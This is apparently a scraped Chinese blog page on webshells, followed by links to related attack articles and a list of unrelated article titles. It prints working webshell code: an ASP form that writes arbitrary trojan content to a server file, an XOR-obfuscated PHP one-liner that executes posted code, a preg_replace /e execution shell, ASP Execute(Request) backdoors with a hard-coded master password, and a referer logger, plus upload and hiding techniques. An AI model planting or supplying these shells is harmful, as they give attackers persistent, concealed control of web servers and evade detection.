关于webshell
1.webshell简介
1
|
< form action = http ://主机路径/TEXT.asp method = post > < textarea name = value cols = 120 rows = 10 width = 45 > set lP=server.createObject("Adodb.Stream")//建立流对象 lP.Open //打开 lP.Type=2 //以文本方式 lP.CharSet="gb2312" //字体标准 lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式 lP.Close //关闭对象 set lP=nothing //释放对象 response.redirect "newmm.asp" //转向newmm.asp </ textarea > < textarea name = newvalue cols = 120 rows = 10 width = 45 >(添入生成木马的内容)</ textarea >< BR >< center >< br > < input type = submit value=提交>
|
如何上传webshell1.解析漏洞上传
2.截断上传
4.利用数据库语句上传
webshell的“安全”
1.关于webshell的隐藏
1.不死僵尸
权限的设置有可读accessable,可写writable,可删deletable,可见visible。
上图可以看到我们将其隐藏了,如前文所说,因为直接绕过了遍历,那么访问绝对路径却可以访问。我的理解是:
一句话木马的隐藏
1.头文件包含隐藏
1
2
3
4
5
6
7
8
|
<?php
@ $_ ++; // 这里++让’_’自加1
$__ =( "#" ^ "|" ); // _
$__ =( "." ^ "~" ); // P
$__ =( "/" ^ "`" ); // O
$__ =( "|" ^ "/" ); // S
$__ =( "{" ^ "/" ); // T
?>
|
然后构造与一句话可以写为
1
2
3
|
<?php @ $_ ++;
$__ =( "#" ^ "|" ).( "." ^ "~" ).( "/" ^ "`" ).( "|" ^ "/" ).( "{" ^ "/" ); // $__的值为_POST
@${ $__ }[! $_ ](${ $__ }[ $_ ]);?>
|
1
2
3
4
|
<?php
function funfunc( $str ){}
echopreg_replace( "/<title>(.+?)<\/title>/ies" , 'funfunc("\1")' , $_POST [ "cmd" ]);
?>
|
1
2
|
< %IfRequest ( "MH" ) < > "" Then Execute ( Request ( "MH" ) ) % >
< % if request ( "MH" ) < > "" thensession ( "MH" ) = request ( "MH" ) : end if : ifsession ( "MH" ) < > "" then executesession ( "MH" ) % >
|
1
2
3
4
5
6
7
|
end function
if session ( "hehe" ) < > userpassthen
ifrequest.form ( "pass" ) < > "" then
if request.form ( "pass" ) = userpassor request.form ( "pass" ) = "1111111" Then
session ( "hehe" ) = userpasss
response.redirect url
else
|
1
2
3
4
5
6
7
8
|
< % url = Request.ServerVariables ( "HTTP_Referer" )
set fs = server.CreateObject ( "Scripting.FileSystemObject" )
set file = fs.OpenTextFile ( server.MapPath ( "hehe.txt" ) , 8 , True )
file .writeline url
file . close
set file = nothing
set fs = nothing
% >
|
关于webshell相关推荐
- WEBSHELL跳板REDUH使用说明
原文链接: http://www.fendou.info/network/webshell-proxy-reduh.html reDuh是可以把内网服务器的端口通过http或https隧道转发到本机, ...
- WEBSHELL恶意代码批量提取清除工具
场景 使用D盾扫描到WEBSHELL后可以导出有路径的文本文件. 最后手动去把WEBSHELL复制到桌面然后以文件路径命名,挨个删除. D盾界面是这样的. 手动一个个找WEBSHELL并且改名效率太低 ...
- 从Webshell到肉鸡
从Webshell到肉鸡 S.S.F simeon 我一直都在强调一个东西,在网络攻防中最重要的就是思维,本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.n ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之Webshell密码
附件题:Webshell密码 题目描述: 某次攻防演练中,抓到了一个webshell的流量,请分析出密码,flag形式:flag{密码} 附件下载: https://download.csdn.net ...
- 一次完整的从webshell到域控的探索之路
前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...
- php带帽接口_利用php自包含特性上传webshell
0x00 前言 今天做到一题道来自百度杯十二月第四场的ctf题,题目名字叫blog 进阶篇,当时没做出来,看了writeup才知道竟然还有这种骚操作来上传文件进行包含. 0x01 题目复现 前面的解题 ...
- 关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范
近弄了两个BBS系统,发现后台传/改Webshell的时候都做了一定限度的防范,使得很多新手不知道如何去传Webshell控制主机.其实这个问题很简单......几分钟就能解决 1.BBSXP 昨天朋 ...
- sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
4.4 使用sqlmap直连MSSQL获取webshell或权限 在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密 ...
- linux脚本读取mssql数据库,WebShell通过SQL语句管理MSSQL
最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Serv ...
- Windows服务器SYSTEM权限Webshell无法添加3389账户情况突破总结
转自:http://bbs.blackbap.org/thread-2331-1-1.html 近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法 ...
最新文章
- 防止办公用计算机,关于加强办公室计算机使用管理的规定
- 用Python操作Oracle
- 重构改善既有代码的设计是php,下篇 |《重构 改善既有代码的设计—笔记》| PHP 技术论坛...
- [JZOJ5281]钦点题解--瞎搞+链表
- 每个程序员都必须遵守的编程原则
- 字体单独设置样式_Glyphs 官方教程 | 字体命名
- Python操作MySQL的封装类
- php多人访问抽奖倒计时一致,Javascript和PHP倒计时器为每个人显示相同的计时器...
- Python 调试:pdb
- 判断客户端是否安装FlashPlayer及版本
- Unity笔记之凤凰模拟器
- 科比退役原因-数据分析
- excel设置下拉菜单多选_如何设置多选Excel下拉菜单
- 40个笑到抽筋的神回复,哈哈哈哈哈...
- Android获取超级管理员权限
- 分析方法--FMEA,6sigma,脑力激荡法
- position的属性(sticky属性)
- 大学里,单身率最高的专业竟然是这些!
- 中青网财经:请一位心理学博士当CTO 只有马云敢这么做
- h5页面的认识与制作
热门文章
- LWN:用户空间的中断!
- linux查看运行的程序c pu,Linux系统入门之进程及任务管理命令
- IntentNet: Learning to Predict Intention from Raw Sensor Data
- matlab 中tan(x),atan(y/x),atan2(y,x) 总结
- 嵌入式技术相关网站和论坛和博客
- 单板计算机(SBC)市场现状研究分析与发展前景预测报告
- 罗技(Logitech)M325鼠标拆解
- 运动品牌推荐,2022年运动好物分享
- 抽象工厂模式、建造者模式结构图
- avalonia 控件DataGrid